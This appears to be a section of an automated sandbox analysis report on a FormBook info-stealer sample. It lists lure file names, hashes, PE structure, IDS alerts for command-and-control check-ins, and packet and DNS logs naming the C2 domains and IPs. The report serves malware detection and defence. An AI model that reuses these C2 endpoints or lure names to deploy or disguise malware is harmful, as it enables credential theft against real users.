SQUARESPACE (US) | disjR92Xrrnc3aZ.exe | malicious | FormBook | 198.185.159.144
SQUARESPACE (US) | http://scarlet-marigold-h469.squarespace.com/ | malicious | Unknown | 198.185.159.177
SQUARESPACE (US) | 2024 Lusail Fence-WITH STICKER-2-003.exe | malicious | FormBook
                                          • 198.185.159.144
                                          INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          Att0027592.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          kpCSGLBxAw2RnrW.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                                          • 198.185.159.144
                                          yq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                          • 198.185.159.145
                                          UHGL-AS-APUCloudHKHoldingsGroupLimitedHKSecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          aAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
                                          • 128.1.131.130
                                          ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          http://paxfuling.com/Get hashmaliciousUnknownBrowse
                                          • 152.32.238.127
                                          BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          z26PEDIDODECOMPRAURGENTE___s___x___l___x____.exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          ORDEN DE COMPRAs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                          • 152.32.156.214
                                          Cotizacin EXP 3382.007-3 - II.exeGet hashmaliciousFormBookBrowse
                                          • 152.32.189.143
No context
No context

Process: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.946897248814463
TrID:
  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
  • Win32 Executable (generic) a (10002005/4) 49.78%
  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
  • Generic Win/DOS Executable (2004/3) 0.01%
  • DOS Executable Generic (2002/1) 0.01%
File name: tYEY1UeurGz0Mjb.exe
File size: 621'056 bytes
MD5: a9c37f81cd9a181dab2262d2f8456a76
SHA1: 549e7a8c8e998d3b7f85e61a7171685af231e780
SHA256: 76650fb8aeaf679cd204ca347026a67767ab8d9c27f65597b275d8d57327e096
SHA512: 9f6c03d6c08eab4c6cf9504fa5402436bc783a9cf95ab9419f1f18f26e605bd66c44fb3a4ab7489bf6a1fcebdc9cb2a65e8a77e5f81744704ebe29c6dfe05002
SSDEEP: 12288:i15ofC1PsZKuN8TsFLtm9FTXJWhnVwVEhkG2jbZVv1XDSXGMvu:i1n1sfSTshg9FwnV3mj9Xd
TLSH: 3BD412D532ACAF0BE43AEBFA8568945583B6BD5768B0F7C41CC130DA647AF048951F23
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..p............... ........@.. ....................................@................................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x498f9e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xD5C8FEB5 [Sat Aug 28 22:56:53 2083 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x98f49          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x9a000          0x5d4         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x9c000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x97374          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x96fa4       0x97000   3cdd806b0ae9c78782b165c15e43a8c4  False     0.9589083842094371  data       7.953654666683159    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x9a000          0x5d4         0x600     3e96ae90b899bf851835f5c685b08d2f  False     0.4375              data       4.1488069805692565   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x9c000          0xc           0x200     af2303c538e6cb9812d67b30e775ec96  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0x9a090  0x344  data                                                                                                  0.44138755980861244
RT_MANIFEST  0x9a3e4  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347

DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
07/04/24-16:34:26.175750  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49716        80         192.168.2.5  216.83.55.173
07/04/24-16:37:49.666946  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49725        80         192.168.2.5  188.114.97.3
07/04/24-16:36:27.968302  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49722        80         192.168.2.5  3.64.163.50
07/04/24-16:34:46.796764  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49717        80         192.168.2.5  154.204.100.23
07/04/24-16:35:46.877456  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49720        80         192.168.2.5  198.185.159.144
07/04/24-16:35:26.166423  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49719        80         192.168.2.5  185.151.30.212
07/04/24-16:36:49.977451  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49723        80         192.168.2.5  128.1.131.130
07/04/24-16:37:09.149461  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49724        80         192.168.2.5  103.8.70.95
07/04/24-16:36:07.818487  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49721        80         192.168.2.5  103.224.212.213
07/04/24-16:38:31.660414  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49727        80         192.168.2.5  23.227.38.74
07/04/24-16:38:10.816088  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49726        80         192.168.2.5  91.195.240.123
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jul 4, 2024 16:34:26.170739889 CEST  49716        80         192.168.2.5      216.83.55.173
Jul 4, 2024 16:34:26.175617933 CEST  80           49716      216.83.55.173    192.168.2.5
Jul 4, 2024 16:34:26.175694942 CEST  49716        80         192.168.2.5      216.83.55.173
Jul 4, 2024 16:34:26.175750017 CEST  49716        80         192.168.2.5      216.83.55.173
Jul 4, 2024 16:34:26.180656910 CEST  80           49716      216.83.55.173    192.168.2.5
Jul 4, 2024 16:34:26.667316914 CEST  49716        80         192.168.2.5      216.83.55.173
Jul 4, 2024 16:34:26.714591026 CEST  80           49716      216.83.55.173    192.168.2.5
Jul 4, 2024 16:34:26.784888983 CEST  80           49716      216.83.55.173    192.168.2.5
Jul 4, 2024 16:34:26.784964085 CEST  49716        80         192.168.2.5      216.83.55.173
Jul 4, 2024 16:34:46.791856050 CEST  49717        80         192.168.2.5      154.204.100.23
Jul 4, 2024 16:34:46.796638966 CEST  80           49717      154.204.100.23   192.168.2.5
Jul 4, 2024 16:34:46.796710968 CEST  49717        80         192.168.2.5      154.204.100.23
Jul 4, 2024 16:34:46.796763897 CEST  49717        80         192.168.2.5      154.204.100.23
Jul 4, 2024 16:34:46.801872969 CEST  80           49717      154.204.100.23   192.168.2.5
Jul 4, 2024 16:34:47.307773113 CEST  49717        80         192.168.2.5      154.204.100.23
Jul 4, 2024 16:34:47.313107967 CEST  80           49717      154.204.100.23   192.168.2.5
Jul 4, 2024 16:34:47.313164949 CEST  49717        80         192.168.2.5      154.204.100.23
Jul 4, 2024 16:35:26.158893108 CEST  49719        80         192.168.2.5      185.151.30.212
Jul 4, 2024 16:35:26.163681984 CEST  80           49719      185.151.30.212   192.168.2.5
Jul 4, 2024 16:35:26.166423082 CEST  49719        80         192.168.2.5      185.151.30.212
Jul 4, 2024 16:35:26.166423082 CEST  49719        80         192.168.2.5      185.151.30.212
Jul 4, 2024 16:35:26.171588898 CEST  80           49719      185.151.30.212   192.168.2.5
Jul 4, 2024 16:35:26.661442995 CEST  49719        80         192.168.2.5      185.151.30.212
Jul 4, 2024 16:35:26.666713953 CEST  80           49719      185.151.30.212   192.168.2.5
Jul 4, 2024 16:35:26.666783094 CEST  49719        80         192.168.2.5      185.151.30.212
Jul 4, 2024 16:35:46.872422934 CEST  49720        80         192.168.2.5      198.185.159.144
Jul 4, 2024 16:35:46.877300024 CEST  80           49720      198.185.159.144  192.168.2.5
Jul 4, 2024 16:35:46.877356052 CEST  49720        80         192.168.2.5      198.185.159.144
Jul 4, 2024 16:35:46.877455950 CEST  49720        80         192.168.2.5      198.185.159.144
Jul 4, 2024 16:35:46.882983923 CEST  80           49720      198.185.159.144  192.168.2.5
Jul 4, 2024 16:35:47.370378971 CEST  49720        80         192.168.2.5      198.185.159.144
Jul 4, 2024 16:35:47.375786066 CEST  80           49720      198.185.159.144  192.168.2.5
Jul 4, 2024 16:35:47.378444910 CEST  49720        80         192.168.2.5      198.185.159.144
Jul 4, 2024 16:36:07.806391001 CEST  49721        80         192.168.2.5      103.224.212.213
Jul 4, 2024 16:36:07.812731028 CEST  80           49721      103.224.212.213  192.168.2.5
Jul 4, 2024 16:36:07.818486929 CEST  49721        80         192.168.2.5      103.224.212.213
Jul 4, 2024 16:36:07.818486929 CEST  49721        80         192.168.2.5      103.224.212.213
Jul 4, 2024 16:36:07.823282003 CEST  80           49721      103.224.212.213  192.168.2.5
Jul 4, 2024 16:36:08.310376883 CEST  49721        80         192.168.2.5      103.224.212.213
Jul 4, 2024 16:36:08.315751076 CEST  80           49721      103.224.212.213  192.168.2.5
Jul 4, 2024 16:36:08.315855980 CEST  49721        80         192.168.2.5      103.224.212.213
Jul 4, 2024 16:36:27.962404013 CEST  49722        80         192.168.2.5      3.64.163.50
Jul 4, 2024 16:36:27.968166113 CEST  80           49722      3.64.163.50      192.168.2.5
Jul 4, 2024 16:36:27.968301058 CEST  49722        80         192.168.2.5      3.64.163.50
Jul 4, 2024 16:36:27.968302011 CEST  49722        80         192.168.2.5      3.64.163.50
Jul 4, 2024 16:36:27.973223925 CEST  80           49722      3.64.163.50      192.168.2.5
Jul 4, 2024 16:36:28.464190006 CEST  49722        80         192.168.2.5      3.64.163.50
Jul 4, 2024 16:36:28.469980001 CEST  80           49722      3.64.163.50      192.168.2.5
Jul 4, 2024 16:36:28.470040083 CEST  49722        80         192.168.2.5      3.64.163.50
Jul 4, 2024 16:36:49.972515106 CEST  49723        80         192.168.2.5      128.1.131.130
Jul 4, 2024 16:36:49.977322102 CEST  80           49723      128.1.131.130    192.168.2.5
Jul 4, 2024 16:36:49.977395058 CEST  49723        80         192.168.2.5      128.1.131.130
Jul 4, 2024 16:36:49.977451086 CEST  49723        80         192.168.2.5      128.1.131.130
Jul 4, 2024 16:36:49.982259989 CEST  80           49723      128.1.131.130    192.168.2.5
Jul 4, 2024 16:36:50.479562044 CEST  49723        80         192.168.2.5      128.1.131.130
Jul 4, 2024 16:36:50.526539087 CEST  80           49723      128.1.131.130    192.168.2.5
Jul 4, 2024 16:36:50.590434074 CEST  80           49723      128.1.131.130    192.168.2.5
Jul 4, 2024 16:36:50.590495110 CEST  49723        80         192.168.2.5      128.1.131.130
Jul 4, 2024 16:37:09.144470930 CEST  49724        80         192.168.2.5      103.8.70.95
Jul 4, 2024 16:37:09.149357080 CEST  80           49724      103.8.70.95      192.168.2.5
Jul 4, 2024 16:37:09.149434090 CEST  49724        80         192.168.2.5      103.8.70.95
Jul 4, 2024 16:37:09.149461031 CEST  49724        80         192.168.2.5      103.8.70.95
Jul 4, 2024 16:37:09.154289961 CEST  80           49724      103.8.70.95      192.168.2.5
Jul 4, 2024 16:37:09.637475014 CEST  49724        80         192.168.2.5      103.8.70.95
Jul 4, 2024 16:37:09.684581995 CEST  80           49724      103.8.70.95      192.168.2.5
Jul 4, 2024 16:37:30.530857086 CEST  80           49724      103.8.70.95      192.168.2.5
Jul 4, 2024 16:37:30.530910969 CEST  49724        80         192.168.2.5      103.8.70.95
Jul 4, 2024 16:37:49.661727905 CEST  49725        80         192.168.2.5      188.114.97.3
Jul 4, 2024 16:37:49.666596889 CEST  80           49725      188.114.97.3     192.168.2.5
Jul 4, 2024 16:37:49.666822910 CEST  49725        80         192.168.2.5      188.114.97.3
Jul 4, 2024 16:37:49.666945934 CEST  49725        80         192.168.2.5      188.114.97.3
Jul 4, 2024 16:37:49.671823978 CEST  80           49725      188.114.97.3     192.168.2.5
Jul 4, 2024 16:37:50.162930012 CEST  80           49725      188.114.97.3     192.168.2.5
Jul 4, 2024 16:37:50.162942886 CEST  80           49725      188.114.97.3     192.168.2.5
Jul 4, 2024 16:37:50.162957907 CEST  80           49725      188.114.97.3     192.168.2.5
Jul 4, 2024 16:37:50.162967920 CEST  80           49725      188.114.97.3     192.168.2.5
Jul 4, 2024 16:37:50.162980080 CEST  80           49725      188.114.97.3     192.168.2.5
Jul 4, 2024 16:37:50.163072109 CEST  49725        80         192.168.2.5      188.114.97.3
Jul 4, 2024 16:37:50.163120985 CEST  49725        80         192.168.2.5      188.114.97.3
Jul 4, 2024 16:37:50.163120985 CEST  49725        80         192.168.2.5      188.114.97.3
Jul 4, 2024 16:37:50.163825989 CEST  80           49725      188.114.97.3     192.168.2.5
Jul 4, 2024 16:37:50.163949013 CEST  49725        80         192.168.2.5      188.114.97.3
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jul 4, 2024 16:34:25.512185097 CEST  57408        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:34:26.169848919 CEST  53           57408      1.1.1.1      192.168.2.5
Jul 4, 2024 16:34:46.417721987 CEST  53136        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:34:46.791239023 CEST  53           53136      1.1.1.1      192.168.2.5
Jul 4, 2024 16:35:26.138349056 CEST  50062        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:35:26.154699087 CEST  53           50062      1.1.1.1      192.168.2.5
Jul 4, 2024 16:35:46.824351072 CEST  49313        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:35:46.871419907 CEST  53           49313      1.1.1.1      192.168.2.5
Jul 4, 2024 16:36:07.319444895 CEST  63670        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:36:07.800064087 CEST  53           63670      1.1.1.1      192.168.2.5
Jul 4, 2024 16:36:27.933382034 CEST  56141        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:36:27.958539963 CEST  53           56141      1.1.1.1      192.168.2.5
Jul 4, 2024 16:36:48.364486933 CEST  57540        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:36:49.370213032 CEST  57540        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:36:49.969120979 CEST  53           57540      1.1.1.1      192.168.2.5
Jul 4, 2024 16:36:49.969204903 CEST  53           57540      1.1.1.1      192.168.2.5
Jul 4, 2024 16:37:08.745883942 CEST  52909        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:37:09.143701077 CEST  53           52909      1.1.1.1      192.168.2.5
Jul 4, 2024 16:37:29.183526039 CEST  61705        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:37:29.602471113 CEST  53           61705      1.1.1.1      192.168.2.5
Jul 4, 2024 16:37:49.623927116 CEST  56309        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:37:49.660924911 CEST  53           56309      1.1.1.1      192.168.2.5
Jul 4, 2024 16:38:10.776838064 CEST  53219        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:38:10.807018042 CEST  53           53219      1.1.1.1      192.168.2.5
Jul 4, 2024 16:38:31.464307070 CEST  57999        53         192.168.2.5  1.1.1.1
Jul 4, 2024 16:38:31.654923916 CEST  53           57999      1.1.1.1      192.168.2.5
                                           Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                           Jul 4, 2024 16:34:25.512185097 CEST | 192.168.2.5 | 1.1.1.1 | 0xf0bc | Standard query (0) | www.yr8gl32.vip | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:46.417721987 CEST | 192.168.2.5 | 1.1.1.1 | 0xfd0f | Standard query (0) | www.cfuhtkwo.xyz | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:35:26.138349056 CEST | 192.168.2.5 | 1.1.1.1 | 0x71fb | Standard query (0) | www.cpuk-finance.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:35:46.824351072 CEST | 192.168.2.5 | 1.1.1.1 | 0x69d1 | Standard query (0) | www.nearmeacupuncture.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:07.319444895 CEST | 192.168.2.5 | 1.1.1.1 | 0x9e8d | Standard query (0) | www.serco2020.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:27.933382034 CEST | 192.168.2.5 | 1.1.1.1 | 0xa6b8 | Standard query (0) | www.mrwine.xyz | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:48.364486933 CEST | 192.168.2.5 | 1.1.1.1 | 0xf704 | Standard query (0) | www.cioncarp4213.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:36:49.370213032 CEST | 192.168.2.5 | 1.1.1.1 | 0xf704 | Standard query (0) | www.cioncarp4213.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:37:08.745883942 CEST | 192.168.2.5 | 1.1.1.1 | 0x6339 | Standard query (0) | www.520yhy.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:37:29.183526039 CEST | 192.168.2.5 | 1.1.1.1 | 0x6150 | Standard query (0) | www.byfchfyr.xyz | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:37:49.623927116 CEST | 192.168.2.5 | 1.1.1.1 | 0x744b | Standard query (0) | www.txglobedev.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:38:10.776838064 CEST | 192.168.2.5 | 1.1.1.1 | 0x147 | Standard query (0) | www.whysco.com | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:38:31.464307070 CEST | 192.168.2.5 | 1.1.1.1 | 0x7fde | Standard query (0) | www.jesuscrewofficial.com | A (IP address) | IN (0x0001) | false
                                           Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | www.yr8gl32.vip | winter.qnwoocaijo.com | | CNAME (Canonical name) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 216.83.55.173 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 216.83.55.177 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 216.83.55.178 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 216.83.55.174 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 96.43.100.199 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 96.43.100.200 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 216.83.55.175 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 216.83.55.176 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 96.43.100.198 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 216.83.55.172 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 96.43.100.204 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 96.43.100.207 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 96.43.100.201 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 96.43.100.197 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 216.83.55.171 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:26.169848919 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0bc | No error (0) | winter.qnwoocaijo.com | | 96.43.100.206 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:34:46.791239023 CEST | 1.1.1.1 | 192.168.2.5 | 0xfd0f | No error (0) | www.cfuhtkwo.xyz | | 154.204.100.23 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:35:26.154699087 CEST | 1.1.1.1 | 192.168.2.5 | 0x71fb | No error (0) | www.cpuk-finance.com | | 185.151.30.212 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:35:46.871419907 CEST | 1.1.1.1 | 192.168.2.5 | 0x69d1 | No error (0) | www.nearmeacupuncture.com | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001) | false
                                           Jul 4, 2024 16:35:46.871419907 CEST | 1.1.1.1 | 192.168.2.5 | 0x69d1 | No error (0) | ext-sq.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:35:46.871419907 CEST | 1.1.1.1 | 192.168.2.5 | 0x69d1 | No error (0) | ext-sq.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:35:46.871419907 CEST | 1.1.1.1 | 192.168.2.5 | 0x69d1 | No error (0) | ext-sq.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001) | false
                                           Jul 4, 2024 16:35:46.871419907 CEST | 1.1.1.1 | 192.168.2.5 | 0x69d1 | No error (0) | ext-sq.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001) | false
